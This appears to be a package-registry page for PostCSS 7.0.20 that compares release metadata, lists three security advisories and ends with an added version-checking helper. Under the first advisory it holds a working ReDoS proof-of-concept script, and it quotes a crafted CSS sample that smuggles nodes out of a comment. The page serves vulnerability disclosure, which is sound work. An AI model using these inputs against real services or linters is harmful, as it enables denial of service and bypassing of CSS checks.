PostCSS version 7.0.20 is a patch release that succeeds 7.0.19 in the 7.x series of the CSS transformation tool driven by JavaScript plugins. Patch releases of this kind matter to developers whose styling pipelines depend on PostCSS. The package metadata of both versions lists the same core dependencies: chalk for command-line styling, source-map for debugging, and supports-color for detecting terminal color support. The license, repository, and author fields are unchanged, so there is no shift in project governance or origin.
The difference between the two releases lies in small changes, most likely bug fixes or efficiency improvements. One indicator is the slightly larger unpackedSize of 7.0.20 (1086573 bytes) compared with 7.0.19 (1085982 bytes), which points to code additions or modifications; 7.0.20 was also published a few hours after 7.0.19. The metadata alone does not say what changed, so the changelog is the only way to judge whether the changes affect a production build. For a consumer of the library the impact is probably minor, in the direction of improved stability or edge-case handling. Before upgrading, consult the official PostCSS changelog and release notes on GitHub to see exactly what was changed and how it might affect an existing PostCSS configuration and build process.
All vulnerabilities affecting version 7.0.20 of the package
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")

// Build an input of n repeated, unterminated source-map annotation prefixes
// followed by "!", the shape that triggers the regex backtracking.
function build_attack(n) {
  var ret = "a{}"
  for (var i = 0; i < n; i++) {
    ret += "/*# sourceMappingURL="
  }
  return ret + "!";
}

// Warm-up parse of a well-formed annotation.
postcss.parse('a{}/*# sourceMappingURL=a.css.map */')

// Parse inputs of increasing length and report how long each parse takes.
for (var i = 1; i <= 500000; i++) {
  if (i % 1000 == 0) {
    var time = Date.now();
    var attack_str = build_attack(i)
    try {
      postcss.parse(attack_str)
      var time_cost = Date.now() - time;
      console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    } catch (e) {
      var time_cost = Date.now() - time;
      console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    }
  }
}
Regular Expression Denial of Service in postcss
The npm package postcss from 7.0.0 and before versions 7.0.36 and 8.2.10 is vulnerable to Regular Expression Denial of Service (ReDoS) during source map parsing.
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, those parts are included in the PostCSS output as CSS nodes (rules, properties) despite originally being inside a comment.
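To check an installed postcss version against the three advisories listed above, here is an added example (not code from postcss or from the advisories). The version ranges are transcribed from the advisory text on this page; the 8.0.0 lower bound for the 8.x branch of the second ReDoS advisory is an assumption, and the helper names are hypothetical.

```javascript
// Added example: report which of the three advisories above apply to a
// given postcss version string (e.g. the "version" field of package.json).

// Parse "MAJOR.MINOR.PATCH" (optional leading "v") into three integers.
function parseVersion(v) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)/.exec(v.trim());
  if (!m) throw new Error("unsupported version string: " + v);
  return [Number(m[1]), Number(m[2]), Number(m[3])];
}

// Numeric comparison per component; negative if a < b, 0 if equal, positive if a > b.
function compareVersions(a, b) {
  const pa = parseVersion(a), pb = parseVersion(b);
  for (let i = 0; i < 3; i++) {
    if (pa[i] !== pb[i]) return pa[i] - pb[i];
  }
  return 0;
}

// A range is [lowInclusive, highExclusive]; null means unbounded on that side.
function inRange(v, [low, high]) {
  return (low === null || compareVersions(v, low) >= 0) &&
         (high === null || compareVersions(v, high) < 0);
}

// Ranges transcribed from the advisory text on this page.
const ADVISORIES = [
  { id: "ReDoS in lib/previous-map.js (before 7.0.36; 8.0.0 up to 8.2.13)",
    ranges: [[null, "7.0.36"], ["8.0.0", "8.2.13"]] },
  { id: "ReDoS during source map parsing (7.0.0 up to 7.0.36; 8.x before 8.2.10)",
    ranges: [["7.0.0", "7.0.36"], ["8.0.0", "8.2.10"]] }, // 8.0.0 bound assumed
  { id: "line return parsing error (before 8.4.31)",
    ranges: [[null, "8.4.31"]] },
];

// Return the ids of every advisory whose ranges contain the given version.
function affectedAdvisories(version) {
  return ADVISORIES
    .filter(a => a.ranges.some(r => inRange(version, r)))
    .map(a => a.id);
}

// The version this page describes is affected by all three advisories.
console.log(affectedAdvisories("7.0.20"));
```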